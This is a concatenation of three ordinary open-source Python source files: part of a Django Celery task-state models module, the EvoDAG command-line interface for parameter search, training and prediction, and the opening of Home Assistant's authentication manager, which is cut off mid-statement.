fmt = '{0.name}: {0.crontab}'
return fmt.format(self)
@property
def schedule(self):
if self.interval:
return self.interval.schedule
if self.crontab:
return self.crontab.schedule
signals.pre_delete.connect(PeriodicTasks.changed, sender=PeriodicTask)
signals.pre_save.connect(PeriodicTasks.changed, sender=PeriodicTask)
class WorkerState(models.Model):
hostname = models.CharField(_('hostname'), max_length=255, unique=True)
last_heartbeat = models.DateTimeField(_('last heartbeat'), null=True,
db_index=True)
objects = managers.ExtendedManager()
class Meta:
"""Model meta-data."""
verbose_name = _('worker')
verbose_name_plural = _('workers')
get_latest_by = 'last_heartbeat'
ordering = ['-last_heartbeat']
def __str__(self):
return self.hostname
def __repr__(self):
return '<WorkerState: {0.hostname}>'.format(self)
def is_alive(self):
if self.last_heartbeat:
# Use UTC timestamp if USE_TZ is true, or else use local timestamp
timestamp = mktime(gmtime()) if settings.USE_TZ else time()
return timestamp < heartbeat_expires(self.heartbeat_timestamp)
return False
@property
def heartbeat_timestamp(self):
return mktime(self.last_heartbeat.timetuple())
@python_2_unicode_compatible
class TaskState(models.Model):
state = models.CharField(
_('state'), max_length=64, choices=TASK_STATE_CHOICES, db_index=True,
)
task_id = models.CharField(_('UUID'), max_length=36, unique=True)
name = models.CharField(
_('name'), max_length=200, null=True, db_index=True,
)
tstamp = models.DateTimeField(_('event received at'), db_index=True)
args = models.TextField(_('Arguments'), null=True)
kwargs = models.TextField(_('Keyword arguments'), null=True)
eta = models.DateTimeField(_('ETA'), null=True)
expires = models.DateTimeField(_('expires'), null=True)
result = models.TextField(_('result'), null=True)
traceback = models.TextField(_('traceback'), null=True)
runtime = models.FloatField(
_('execution time'), null=True,
help_text=_('in seconds if task succeeded'),
)
retries = models.IntegerField(_('number of retries'), default=0)
worker = models.ForeignKey(
WorkerState, null=True, verbose_name=_('worker'),
)
hidden = models.BooleanField(editable=False, default=False, db_index=True)
objects = managers.TaskStateManager()
class Meta:
"""Model meta-data."""
verbose_name = _('task')
verbose_name_plural = _('tasks')
get_latest_by = 'tstamp'
ordering = ['-tstamp']
def save(self, *args, **kwargs):
if self.eta is not None:
self.eta = fromtimestamp(float('%d.%s' % (
mktime(self.eta.timetuple()), self.eta.microsecond,
)))
if self.expires is not None:
self.expires = fromtimestamp(float('%d.%s' % (
mktime(self.expires.timetuple()), self.expires.microsecond,
)))
super(TaskState, self).save(*args, **kwargs)
def __str__(self):
name = self.name or 'UNKNOWN'
s = '{0.state:<10} {0.task_id:<36} {1}'.format(self, name)
if self.eta:
s += ' eta:{0.eta}'.format(self)
return s
def __repr__(self):
return '<TaskState: {0.state} {1}[{0.task_id}] ts:{0.tstamp}>'.format(
self, self.name or 'UNKNOWN',
)
| |
# Copyright 2016 Mario Graff Guerrero
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import numpy as np
from .utils import RandomParameterSearch, PARAMS
from SparseArray import SparseArray
from .model import Ensemble, EvoDAG as model_EvoDAG, EvoDAGE
import collections
import os
from multiprocessing import Pool
import EvoDAG as evodag
from EvoDAG import EvoDAG
from .utils import tonparray
from .utils import Inputs
import time
import gzip
import json
import logging
import gc
import pickle
DEFAULT_PARAMETERS = os.path.join(os.path.dirname(__file__),
'conf', 'default_parameters.json')
try:
from tqdm import tqdm
except ImportError:
def tqdm(x, **kwargs):
return x
def init_evodag(seed_args_X_y_test):
seed, args, X, y, test, dirname = seed_args_X_y_test
if dirname is not None:
output = os.path.join(dirname, '%s.evodag' % seed)
if os.path.isfile(output):
with gzip.open(output) as fpt:
try:
return pickle.load(fpt)
except Exception:
pass
m = EvoDAG(seed=seed, **args).fit(X, y, test_set=test)
m = m.model()
gc.collect()
if dirname is not None:
with gzip.open(output, 'w') as fpt:
pickle.dump(m, fpt)
return m
def rs_evodag(args_X_y):
args, X, y = args_X_y
rs = RandomParameterSearch
fit = []
init = time.time()
for seed in range(3):
try:
evo = EvoDAG(seed=seed,
**rs.process_params(args)).fit(X, y)
fit.append(evo.model().fitness_vs)
except RuntimeError:
fit.append(-np.inf)
args['_time'] = time.time() - init
gc.collect()
return fit, args
def get_model_fitness(fname):
with gzip.open(fname) as fpt:
_ = pickle.load(fpt)
return (fname, _.fitness_vs)
class CommandLine(object):
def version(self):
pa = self.parser.add_argument
pa('--version',
action='version', version='EvoDAG %s' % evodag.__version__)
pa('--verbose', dest='verbose', default=logging.NOTSET, type=int)
def output_file(self):
self.parser.add_argument('-o', '--output-file',
help='File to store the test set',
dest='output_file',
default=None,
type=str)
def ensemble(self):
self.parser.add_argument('-n', '--ensemble-size',
help='Ensemble size',
dest='ensemble_size',
default=30,
type=int)
def cores(self):
self.parser.add_argument('-u', '--cpu-cores',
help='Number of cores',
dest='cpu_cores',
default=1,
type=int)
def test_set(self):
cdn = 'File containing the test set on csv.'
self.parser.add_argument('-t', '--test_set',
default=None, type=str,
help=cdn)
def init_params(self):
pa = self.parser.add_argument
g = self.parser.add_mutually_exclusive_group(required=True)
g.add_argument('-C', '--classifier', dest='classifier',
help='The task is classification (default)',
default=True,
action="store_true")
g.add_argument('-R', '--regressor', dest='regressor',
help='The task is regression',
action="store_true")
pa('-e', '--early_stopping_rounds', dest='early_stopping_rounds',
type=int,
help='Early stopping rounds')
pa('-p', '--popsize', dest='popsize',
type=int, help='Population size')
pa('-s', '--seed', dest='seed',
default=0,
type=int, help='Seed')
pa('-j', '--json', dest='json',
action="store_true",
help='Whether the inputs are in json format',
default=False)
pa('--time-limit', dest='time_limit',
help='Time limit in seconds', type=int)
def training_set(self):
cdn = 'File containing the training set on csv.'
self.parser.add_argument('training_set',
nargs='?',
default=None,
help=cdn)
def parse_args(self):
self.data = self.parser.parse_args()
if hasattr(self.data, 'regressor') and self.data.regressor:
self.data.classifier = False
if hasattr(self.data, 'verbose'):
logging.basicConfig()
logger = logging.getLogger('EvoDAG')
logger.setLevel(self.data.verbose)
logger.info('Logging to: %s', self.data.verbose)
self.main()
def read_training_set(self):
if self.data.training_set is None:
return
if not self.data.json:
self.X, self.y = self.inputs.read_csv(self.data.training_set, self.data.output_dim)
return True
else:
self.X, self.y = self.inputs.read_data_json(self.data.training_set)
return True
def read_test_set(self):
if self.data.test_set is None:
return False
if not self.data.json:
self.Xtest, _ = self.inputs.read_csv(self.data.test_set, 0)
return True
else:
self.Xtest, _ = self.inputs.read_data_json(self.data.test_set)
return True
def get_model_file(self):
if self.data.model_file is None:
a = self.data.training_set.split('.')[0]
self.data.model_file = a + '.evodag.gz'
return self.data.model_file
def get_output_file(self):
if self.data.output_file is None:
self.data.output_file = self.data.test_set + '.evodag.csv'
# if self.data.json:
# self.data.output_file += '.json'
# else:
# self.data.output_file += '.csv'
return self.data.output_file
def id2label(self, x):
if not self.data.classifier:
return x
if len(self.label2id) == 0:
return x
i2w = dict([(i[1], i[0]) for i in self.label2id.items()])
return [i2w[int(i)] for i in x]
def main(self):
pass
class CommandLineParams(CommandLine):
def __init__(self):
self.Xtest = None
self.inputs = Inputs()
self.word2id = self.inputs.word2id
self.label2id = self.inputs.label2id
self.parser = argparse.ArgumentParser(description="EvoDAG")
self.training_set()
self.init_params()
self.optimize_parameters()
self.cores()
self.version()
def optimize_parameters(self):
cdn = '''Optimize parameters sampling
N (734 by default) points from the parameter space'''
self.parser.add_argument('-r', '--optimize-parameters',
dest='optimize_parameters',
default=734,
type=int, help=cdn)
cdn = 'File to store the fitness of the parameters explored'
self.parser.add_argument('-P', '--parameters',
dest='parameters',
type=str,
help=cdn)
cdn = 'File containing the parameters values (json) to be explored'
self.parser.add_argument('--parameters-values',
dest='parameters_values',
type=str,
help=cdn)
self.parser.add_argument('--output-dim',
dest='output_dim',
default=1,
type=int,
help="Output Dimension (default 1) use with multiple-outputs flag")
self.parser.add_argument('--only-paramsfiles',
help='Save the params to disk creating a directory',
dest='do_nothing',
action="store_true",
default=False)
def fs_type_constraint(self, params):
fs_class = {}
for x in EvoDAG()._function_set:
fs_class[x.__name__] = x
p_delete = []
for x in params.keys():
if x in fs_class:
try:
if self.data.classifier:
flag = fs_class[x].classification
else:
flag = fs_class[x].regression
if not flag:
p_delete.append(x)
except AttributeError:
pass
for x in p_delete:
del params[x]
def if_type_contraint(self, params):
import importlib
unique = {}
if 'input_functions' not in params:
return
input_functions = params['input_functions']
R = []
for inner in input_functions:
r = []
for f in inner:
_ = importlib.import_module('EvoDAG.node')
j = getattr(_, f)
if self.data.classifier:
flag = j.classification
else:
flag = j.regression
if flag:
r.append(f)
if len(r):
key = ';'.join(r)
if key not in unique:
R.append(r)
unique[key] = 1
if len(R) == 1:
R = R[0]
params['input_functions'] = R
def evolve(self, kw):
if self.data.parameters_values:
with open(self.data.parameters_values, 'r') as fpt:
params = json.loads(fpt.read())
else:
params = PARAMS.copy()
if len(kw):
for k, v in kw.items():
if k in params and v is not None:
params[k] = [v]
self.fs_type_constraint(params)
self.if_type_contraint(params)
parameters = self.data.parameters
if parameters is None:
parameters = self.data.training_set + '.EvoDAGparams'
npoints = self.data.optimize_parameters
if isinstance(self.X, list):
training_size = self.X[0].size()
else:
training_size = self.X.shape[0]
rs = RandomParameterSearch(params=params,
seed=self.data.seed,
training_size=training_size,
npoints=npoints)
if self.data.do_nothing:
os.mkdir(parameters)
for k, x in enumerate(rs):
fname = os.path.join(parameters, '%s_params.json' % k)
with open(fname, 'w') as fpt:
fpt.write(json.dumps(x, sort_keys=True, indent=2))
return
if self.data.cpu_cores == 1:
res = [rs_evodag((args, self.X, self.y))
for args in tqdm(rs, total=rs._npoints)]
else:
p = Pool(self.data.cpu_cores, maxtasksperchild=1)
args = [(args, self.X, self.y) for args in rs]
res = [x for x in tqdm(p.imap_unordered(rs_evodag, args),
total=len(args))]
p.close()
[x[1].update(dict(fitness=x[0])) for x in res]
res = [x[1] for x in res]
[x.update(kw) for x in res]
res.sort(key=lambda x: np.median(x['fitness']), reverse=True)
res = json.dumps(res, sort_keys=True, indent=2)
if parameters.endswith('.gz'):
with gzip.open(parameters, 'wb') as fpt:
try:
fpt.write(bytes(res, encoding='utf-8'))
except TypeError:
fpt.write(res)
else:
with open(parameters, 'w') as fpt:
fpt.write(res)
def main(self):
self.read_training_set()
kw = {}
if self.data.classifier:
self.data.multiple_outputs = True
elif self.data.output_dim > 1:
self.data.multiple_outputs = True
for k, v in EvoDAG().get_params().items():
if hasattr(self.data, k) and getattr(self.data, k) is not None:
kw[k] = getattr(self.data, k)
self.evolve(kw)
class CommandLineTrain(CommandLine):
def __init__(self):
self.Xtest = None
self.inputs = Inputs()
self.word2id = self.inputs.word2id
self.label2id = self.inputs.label2id
self.parser = argparse.ArgumentParser(description="EvoDAG")
self.training_set()
self.parameters()
self.model()
self.cores()
self.ensemble()
self.test_set()
self.version()
def parameters(self):
cdn = 'File containing a list of parameters explored,\
the first one being the best'
g = self.parser.add_mutually_exclusive_group(required=True)
g.add_argument('-C', '--classifier', dest='classifier',
help='The task is classification (default)',
default=True,
action="store_true")
g.add_argument('-R', '--regressor', dest='regressor',
help='The task is regression',
action="store_true")
g.add_argument('-P', '--parameters',
dest='parameters',
default=None,
type=str,
help=cdn)
self.parser.add_argument('--output-dim',
dest='output_dim',
default=1,
type=int,
help="Output Dimension (default 1) use with multiple-outputs flag")
dr = self.parser.add_argument
dr('--kw', dest='kwargs', default=None, type=str,
help='Parameters in json that overwrite default parameters')
def model(self):
cdn = 'File to store EvoDAG model'
pa = self.parser.add_argument
pa('-m', '--model',
dest='model_file',
type=str,
help=cdn)
pa('-j', '--json', dest='json',
action="store_true",
help='Whether the inputs are in json format',
default=False)
# pa('--min-size', dest='min_size',
# type=int, default=1, help='Model min-size')
pa('-s', '--seed', dest='seed',
default=-1, type=int, help='Seed')
def main(self):
self.read_training_set()
self.read_test_set()
model_file = self.get_model_file()
classifier = False if self.data.regressor else True
kw = dict(params_fname=self.data.parameters, classifier=classifier)
if self.data.seed >= 0:
kw['seed'] = self.data.seed
if self.data.kwargs is not None:
_ = json.loads(self.data.kwargs)
kw.update(_)
if self.data.ensemble_size == 1:
evo = model_EvoDAG(**kw).fit(self.X, self.y, test_set=self.Xtest)
self.model = evo.model
else:
self.model = EvoDAGE(n_estimators=self.data.ensemble_size,
n_jobs=self.data.cpu_cores,
tmpdir=model_file + '_dir',
**kw).fit(self.X, self.y,
test_set=self.Xtest)
with gzip.open(model_file, 'w') as fpt:
pickle.dump(self.model, fpt)
pickle.dump(self.word2id, fpt)
pickle.dump(self.label2id, fpt)
class CommandLinePredict(CommandLine):
def __init__(self):
self.Xtest = None
self.inputs = Inputs()
self.word2id = self.inputs.word2id
self.label2id = self.inputs.label2id
self.parser = argparse.ArgumentParser(description="EvoDAG")
self.model()
self.test_set()
self.output_file()
self.raw_outputs()
self.cores()
self.version()
def test_set(self):
cdn = 'File containing the test set on csv.'
self.parser.add_argument('test_set',
default=None,
help=cdn)
def raw_outputs(self):
cdn = 'Raw decision function.'
self.parser.add_argument('--raw-outputs',
default=False,
dest='raw_outputs',
action='store_true',
help=cdn)
def model(self):
cdn = 'EvoDAG model'
pa = self.parser.add_argument
pa('-m', '--model',
dest='model_file',
type=str,
help=cdn)
pa('-j', '--json', dest='json',
action="store_true",
help='Whether the inputs are in json format',
default=False)
pa('--decision-function', dest='decision_function', default=False,
action='store_true',
help='Outputs the decision functions instead of the class')
pa('--predict-proba', dest='predict_proba', default=False,
action='store_true',
help='Outputs the probability instead of the class')
def main(self):
model_file = self.get_model_file()
with gzip.open(model_file, 'r') as fpt:
m = pickle.load(fpt)
self.inputs.word2id.update(pickle.load(fpt))
self.inputs.label2id.update(pickle.load(fpt))
self.read_test_set()
self.data.classifier = m.classifier
if self.data.raw_outputs:
m._n_jobs = self.data.cpu_cores
hy = m.raw_decision_function(self.Xtest)
if hy.ndim == 3:
hy.shape = (hy.shape[1] * hy.shape[0], hy.shape[-1])
hy = "\n".join([",".join([str(i) for i in x]) for x in hy])
elif self.data.predict_proba:
m._n_jobs = self.data.cpu_cores
hy = m.predict_proba(self.Xtest)
hy = "\n".join([",".join([str(i) for i in x]) for x in hy])
elif self.data.decision_function:
hy = m.decision_function(self.Xtest, cpu_cores=self.data.cpu_cores)
hy = "\n".join([",".join([str(i) for i in x]) for x in hy])
else:
hy = self.id2label(m.predict(self.Xtest, cpu_cores=self.data.cpu_cores))
hy = "\n".join(map(str, hy))
with open(self.get_output_file(), 'w') as fpt:
fpt.write(hy)
class CommandLineUtils(CommandLine):
def __init__(self):
self.Xtest = None
self.inputs = Inputs()
self.word2id = self.inputs.word2id
self.label2id = self.inputs.label2id
self.parser = argparse.ArgumentParser(description="EvoDAG")
self.model()
self.graphviz()
self.params_stats()
self.output_file()
self.fitness()
self.size()
self.height()
self.remove_terminals()
self.used_inputs_number()
self.create_ensemble_params()
self.cores()
self.version()
def create_ensemble_params(self):
self.parser.add_argument('--create-ensemble',
help='Models to ensemble', dest='ensemble',
default=False, action='store_true')
self.parser.add_argument('--best-params-file',
help='Search for the best configuration in a given directory', dest='best_params_file', default=False, action='store_true')
self.parser.add_argument('-n', '--ensemble-size',
help='Ensemble size (default: select all models)',
dest='ensemble_size',
default=-1,
type=int)
def used_inputs_number(self):
self.parser.add_argument('--used-inputs-number',
help='Number of inputs used',
dest='used_inputs_number',
default=False, action='store_true')
def remove_terminals(self):
self.parser.add_argument('--remove-terminals',
help='Do not display terminals',
dest='remove_terminals',
default=False, action='store_true')
def height(self):
self.parser.add_argument('--height',
help='Model height',
dest='height',
default=False, action='store_true')
def size(self):
self.parser.add_argument('--size',
help='Model size',
dest='size',
default=False, action='store_true')
def fitness(self):
self.parser.add_argument('--fitness',
help='Fitness in the validation set',
dest='fitness',
default=False, action='store_true')
def graphviz(self):
self.parser.add_argument('-G', '--graphviz',
help='Plot the model using dot language',
dest='graphviz',
default=False, action='store_true')
def params_stats(self):
self.parser.add_argument('-P', '--params-stats',
help='Parameters statistics',
dest='params_stats',
default=False, action='store_true')
def output_file(self):
self.parser.add_argument('-o', '--output-file',
help='File / directory to store the result(s)',
dest='output_file',
default=None,
type=str)
def model(self):
cdn = 'File containing the model/params.'
self.parser.add_argument('model_file',
default=None,
type=str,
help=cdn)
def read_params(self, parameters):
if parameters.endswith('.gz'):
with gzip.open(parameters, 'rb') as fpt:
try:
res = fpt.read()
return json.loads(str(res, encoding='utf-8'))
except TypeError:
return json.loads(res)
else:
with open(parameters, 'r') as fpt:
return json.loads(fpt.read())
def create_ensemble(self, model_file):
from glob import glob
models = []
flag = False
for fname in model_file.split(' '):
for k in tqdm(glob(fname)):
try:
with gzip.open(k, 'r') as fpt:
models.append(pickle.load(fpt))
self.inputs.word2id.update(pickle.load(fpt))
self.inputs.label2id.update(pickle.load(fpt))
except EOFError:
flag = True
os.unlink(k)
if flag:
raise RuntimeError('Unable to read models')
models.sort(key=lambda x: x.fitness_vs, reverse=True)
if self.data.ensemble_size > 0:
models = models[:self.data.ensemble_size]
self.model = Ensemble(models)
model_file = self.data.output_file
with gzip.open(model_file, 'w') as fpt:
pickle.dump(self.model, fpt)
pickle.dump(self.word2id, fpt)
pickle.dump(self.label2id, fpt)
def get_best_params(self, model_file):
from glob import glob
h = {}
args = glob('%s/*.model' % model_file)
if self.data.cpu_cores == 1:
res = [get_model_fitness(x) for x in tqdm(args)]
else:
p = Pool(self.data.cpu_cores)
res = [x for x in tqdm(p.imap_unordered(get_model_fitness, args),
total=len(args))]
p.close()
for m, fit in res:
basename = (m.split(os.path.join(model_file, ''))[1]).split('_')[:1]
fname = "_".join(basename)
try:
h[fname].append(fit)
except KeyError:
h[fname] = [fit]
b = max(h.items(), key=lambda x: np.median(x[1]))
self.best_params = b[0] + '_params.json'
def main(self):
def most_common(K, a):
try:
str_type = unicode
except NameError:
str_type = str
l = a.most_common()
if len(l):
if len(PARAMS[K]) <= 2:
return l[0]
elif isinstance(l[0][0], str_type):
return l[0]
else:
num = np.sum([x * y for x, y in a.items()])
den = float(np.sum([y for y in a.values()]))
return num / den
return ""
model_file = self.get_model_file()
if self.data.graphviz:
with gzip.open(model_file, 'r') as fpt:
m = pickle.load(fpt)
self.inputs.word2id.update(pickle.load(fpt))
self.inputs.label2id.update(pickle.load(fpt))
remove_terminals = self.data.remove_terminals
if remove_terminals:
m.graphviz(self.data.output_file, terminals=False)
else:
m.graphviz(self.data.output_file)
elif self.data.params_stats:
params = {k: collections.Counter() for k in PARAMS.keys()}
stats = self.read_params(model_file)
for l in stats:
for k, v in l.items():
if k not in params:
continue
params[k][v] += 1
with open(self.data.output_file, 'w') as fpt:
fpt.write(json.dumps({k: most_common(k, v) for k, v
in params.items()}, sort_keys=True, indent=2))
elif self.data.fitness:
with gzip.open(model_file, 'r') as fpt:
m = pickle.load(fpt)
self.inputs.word2id.update(pickle.load(fpt))
self.inputs.label2id.update(pickle.load(fpt))
print("Median fitness: %0.4f" % (m.fitness_vs * -1))
elif self.data.size:
with gzip.open(model_file, 'r') as fpt:
m = pickle.load(fpt)
self.inputs.word2id.update(pickle.load(fpt))
self.inputs.label2id.update(pickle.load(fpt))
print("Size: %s" % m.size)
elif self.data.height:
with gzip.open(model_file, 'r') as fpt:
m = pickle.load(fpt)
self.inputs.word2id.update(pickle.load(fpt))
self.inputs.label2id.update(pickle.load(fpt))
print("Height: %s" % m.height)
elif self.data.used_inputs_number:
with gzip.open(model_file, 'r') as fpt:
m = pickle.load(fpt)
self.word2id = pickle.load(fpt)
self.label2id = pickle.load(fpt)
inputs = m.inputs()
print("Used inputs number", len(inputs))
elif self.data.ensemble:
self.create_ensemble(model_file)
elif self.data.best_params_file:
self.get_best_params(model_file)
print(self.best_params)
def params(output=False):
"EvoDAG-params command line"
c = CommandLineParams()
c.parse_args()
if output:
return c
def train(output=False):
"EvoDAG-params command line"
c = CommandLineTrain()
c.parse_args()
if output:
return c
def predict():
"EvoDAG-params command line"
c = CommandLinePredict()
c.parse_args()
def utils(output=False):
"EvoDAG-utils command line"
c = CommandLineUtils()
c.parse_args()
if output:
return c
| |
"""Provide an authentication layer for Home Assistant."""
from __future__ import annotations
import asyncio
from collections import OrderedDict
from datetime import timedelta
from typing import Any, Dict, Mapping, Optional, Tuple, cast
import jwt
from homeassistant import data_entry_flow
from homeassistant.core import CALLBACK_TYPE, HomeAssistant, callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.util import dt as dt_util
from . import auth_store, models
from .const import ACCESS_TOKEN_EXPIRATION, GROUP_ID_ADMIN
from .mfa_modules import MultiFactorAuthModule, auth_mfa_module_from_config
from .providers import AuthProvider, LoginFlow, auth_provider_from_config
EVENT_USER_ADDED = "user_added"
EVENT_USER_REMOVED = "user_removed"
_MfaModuleDict = Dict[str, MultiFactorAuthModule]
_ProviderKey = Tuple[str, Optional[str]]
_ProviderDict = Dict[_ProviderKey, AuthProvider]
class InvalidAuthError(Exception):
"""Raised when a authentication error occurs."""
class InvalidProvider(Exception):
"""Authentication provider not found."""
async def auth_manager_from_config(
hass: HomeAssistant,
provider_configs: list[dict[str, Any]],
module_configs: list[dict[str, Any]],
) -> AuthManager:
"""Initialize an auth manager from config.
CORE_CONFIG_SCHEMA will make sure do duplicated auth providers or
mfa modules exist in configs.
"""
store = auth_store.AuthStore(hass)
if provider_configs:
providers = await asyncio.gather(
*(
auth_provider_from_config(hass, store, config)
for config in provider_configs
)
)
else:
providers = []
# So returned auth providers are in same order as config
provider_hash: _ProviderDict = OrderedDict()
for provider in providers:
key = (provider.type, provider.id)
provider_hash[key] = provider
if module_configs:
modules = await asyncio.gather(
*(auth_mfa_module_from_config(hass, config) for config in module_configs)
)
else:
modules = []
# So returned auth modules are in same order as config
module_hash: _MfaModuleDict = OrderedDict()
for module in modules:
module_hash[module.id] = module
manager = AuthManager(hass, store, provider_hash, module_hash)
return manager
class AuthManagerFlowManager(data_entry_flow.FlowManager):
"""Manage authentication flows."""
def __init__(self, hass: HomeAssistant, auth_manager: AuthManager) -> None:
"""Init auth manager flows."""
super().__init__(hass)
self.auth_manager = auth_manager
async def async_create_flow(
self,
handler_key: Any,
*,
context: dict[str, Any] | None = None,
data: dict[str, Any] | None = None,
) -> data_entry_flow.FlowHandler:
"""Create a login flow."""
auth_provider = self.auth_manager.get_auth_provider(*handler_key)
if not auth_provider:
raise KeyError(f"Unknown auth provider {handler_key}")
return await auth_provider.async_login_flow(context)
async def async_finish_flow(
self, flow: data_entry_flow.FlowHandler, result: FlowResult
) -> FlowResult:
"""Return a user as result of login flow."""
flow = cast(LoginFlow, flow)
if result["type"] != data_entry_flow.RESULT_TYPE_CREATE_ENTRY:
return result
# we got final result
if isinstance(result["data"], models.Credentials):
result["result"] = result["data"]
return result
auth_provider = self.auth_manager.get_auth_provider(*result["handler"])
if not auth_provider:
raise KeyError(f"Unknown auth provider {result['handler']}")
credentials = await auth_provider.async_get_or_create_credentials(
cast(Mapping[str, str], result["data"]),
)
if flow.context.get("credential_only"):
result["result"] = credentials
return result
# multi-factor module cannot enabled for new credential
# which has not linked to a user yet
if auth_provider.support_mfa and not credentials.is_new:
user = await self.auth_manager.async_get_user_by_credentials(credentials)
if user is not None:
modules = await self.auth_manager.async_get_enabled_mfa(user)
if modules:
flow.credential = credentials
flow.user = user
flow.available_mfa_modules = modules
return await flow.async_step_select_mfa_module()
result["result"] = credentials
return result
class AuthManager:
"""Manage the authentication for Home Assistant."""
def __init__(
self,
hass: HomeAssistant,
store: auth_store.AuthStore,
providers: _ProviderDict,
mfa_modules: _MfaModuleDict,
) -> None:
"""Initialize the auth manager."""
self.hass = hass
self._store = store
self._providers = providers
self._mfa_modules = mfa_modules
self.login_flow = AuthManagerFlowManager(hass, self)
self._revoke_callbacks: dict[str, list[CALLBACK_TYPE]] = {}
@property
def auth_providers(self) -> list[AuthProvider]:
"""Return a list of available auth providers."""
return list(self._providers.values())
@property
def auth_mfa_modules(self) -> list[MultiFactorAuthModule]:
"""Return a list of available auth modules."""
return list(self._mfa_modules.values())
def get_auth_provider(
self, provider_type: str, provider_id: str | None
) -> AuthProvider | None:
"""Return an auth provider, None if not found."""
return self._providers.get((provider_type, provider_id))
def get_auth_providers(self, provider_type: str) -> list[AuthProvider]:
"""Return a List of auth provider of one type, Empty if not found."""
return [
provider
for (p_type, _), provider in self._providers.items()
if p_type == provider_type
]
def get_auth_mfa_module(self, module_id: str) -> MultiFactorAuthModule | None:
"""Return a multi-factor auth module, None if not found."""
return self._mfa_modules.get(module_id)
async def async_get_users(self) -> list[models.User]:
"""Retrieve all users."""
return await self._store.async_get_users()
async def async_get_user(self, user_id: str) -> models.User | None:
"""Retrieve a user."""
return await self._store.async_get_user(user_id)
async def async_get_owner(self) -> models.User | None:
"""Retrieve the owner."""
users = await self.async_get_users()
return next((user for user in users if user.is_owner), None)
async def async_get_group(self, group_id: str) -> models.Group | None:
"""Retrieve all groups."""
return await self._store.async_get_group(group_id)
async def async_get_user_by_credentials(
self, credentials: models.Credentials
) -> models.User | None:
"""Get a user by credential, return None if not found."""
for user in await self.async_get_users():
for creds in user.credentials:
if creds.id == credentials.id:
return user
return None
async def async_create_system_user(
self, name: str, group_ids: list[str] | None = None
) -> models.User:
"""Create a system user."""
user = await self._store.async_create_user(
name=name, system_generated=True, is_active=True, group_ids=group_ids or []
)
self.hass.bus.async_fire(EVENT_USER_ADDED, {"user_id": user.id})
return user
async def async_create_user(
self, name: str, group_ids: list[str] | None = None
) -> models.User:
"""Create a user."""
kwargs: dict[str, Any] = {
"name": name,
"is_active": True,
"group_ids": group_ids or [],
}
if await self._user_should_be_owner():
kwargs["is_owner"] = True
user = await self._store.async_create_user(**kwargs)
self.hass.bus.async_fire(EVENT_USER_ADDED, {"user_id": user.id})
return user
async def async_get_or_create_user(
self, credentials: models.Credentials
) -> models.User:
"""Get or create a user."""
if not credentials.is_new:
user = await self.async_get_user_by_credentials(credentials)
if user is None:
raise ValueError("Unable to find the user.")
return user
auth_provider = self._async_get_auth_provider(credentials)
if auth_provider is None:
raise RuntimeError("Credential with unknown provider encountered")
info = await auth_provider.async_user_meta_for_credentials(credentials)
user = await self._store.async_create_user(
credentials=credentials,
name=info.name,
is_active=info.is_active,
group_ids=[GROUP_ID_ADMIN],
)
self.hass.bus.async_fire(EVENT_USER_ADDED, {"user_id": user.id})
return user
async def async_link_user(
self, user: models.User, credentials: models.Credentials
) -> None:
"""Link credentials to an existing user."""
linked_user = await self.async_get_user_by_credentials(credentials)
if linked_user == user:
return
if linked_user is not None:
raise ValueError("Credential is already linked to a user")
await self._store.async_link_user(user, credentials)
async def async_remove_user(self, user: models.User) -> None:
"""Remove a user."""
tasks = [
self.async_remove_credentials(credentials)
for credentials in user.credentials
]
if tasks:
await asyncio.gather(*tasks)
await self._store.async_remove_user(user)
self.hass.bus.async_fire(EVENT_USER_REMOVED, {"user_id": user.id})
async def async_update_user(
self,
user: models.User,
name: str | None = None,
is_active: bool | None = None,
group_ids: list[str] | None = None,
) -> None:
"""Update a user."""
kwargs: dict[str, Any] = {}
if name is not None:
kwargs["name"] = name
if group_ids is not None:
kwargs["group_ids"] = group_ids
await self._store.async_update_user(user, **kwargs)
if is_active is not None:
if is_active is True:
await self.async_activate_user(user)
else:
await self.async_deactivate_user(user)
async def async_activate_user(self, user: models.User) -> None:
"""Activate a user."""
await self._store.async_activate_user(user)
async def async_deactivate_user(self, user: models.User) -> None:
"""Deactivate a user."""
if user.is_owner:
raise ValueError("Unable to deactivate the owner")
await self._store.async_deactivate_user(user)
async def async_remove_credentials(self, credentials: models.Credentials) -> None:
"""Remove credentials."""
provider = self._async_get_auth_provider(credentials)
if provider is not None and hasattr(provider, "async_will_remove_credentials"):
# https://github.com/python/mypy/issues/1424
await provider.async_will_remove_credentials(credentials) # type: ignore
await self._store.async_remove_credentials(credentials)
async def async_enable_user_mfa(
self, user: models.User, mfa_module_id: str, data: Any
) -> None:
"""Enable a multi-factor auth module for user."""
if user.system_generated:
raise ValueError(
"System generated users cannot enable multi-factor auth module."
)
if (module := self.get_auth_mfa_module(mfa_module_id)) is None:
raise ValueError(f"Unable find multi-factor auth module: {mfa_module_id}")
await module.async_setup_user(user.id, data)
async def async_disable_user_mfa(
self, user: models.User, mfa_module_id: str
) -> None:
"""Disable a multi-factor auth module for user."""
if user.system_generated:
raise ValueError(
"System generated users cannot disable multi-factor auth module."
)
if (module := self.get_auth_mfa_module(mfa_module_id)) is None:
raise ValueError(f"Unable find multi-factor auth module: {mfa_module_id}")
await module.async_depose_user(user.id)
async def async_get_enabled_mfa(self, user: models.User) -> dict[str, str]:
"""List enabled mfa modules for user."""
modules: dict[str, str] = OrderedDict()
for module_id, module in self._mfa_modules.items():
if await module.async_is_user_setup(user.id):
modules[module_id] = module.name
return modules
async def async_create_refresh_token(
self,
user: models.User,
client_id: str | None = None,
client_name: str | None = None,
client_icon: str | None = None,
token_type: str | None = None,
access_token_expiration: timedelta = ACCESS_TOKEN_EXPIRATION,
credential: models.Credentials | None = None,
) -> models.RefreshToken:
"""Create a new refresh token for a user."""
if not user.is_active:
raise ValueError("User is not active")
if user.system_generated and client_id is not None:
raise ValueError(
"System generated users cannot have refresh tokens connected "
"to a client."
)
if token_type is None:
if user.system_generated:
token_type = models.TOKEN_TYPE_SYSTEM
else:
token_type = models.TOKEN_TYPE_NORMAL
if user.system_generated != (token_type == models.TOKEN_TYPE_SYSTEM):
raise ValueError(
"System generated users can only have system type refresh tokens"
)
if token_type == models.TOKEN_TYPE_NORMAL and client_id is None:
raise ValueError("Client is required to generate a refresh token.")
if (
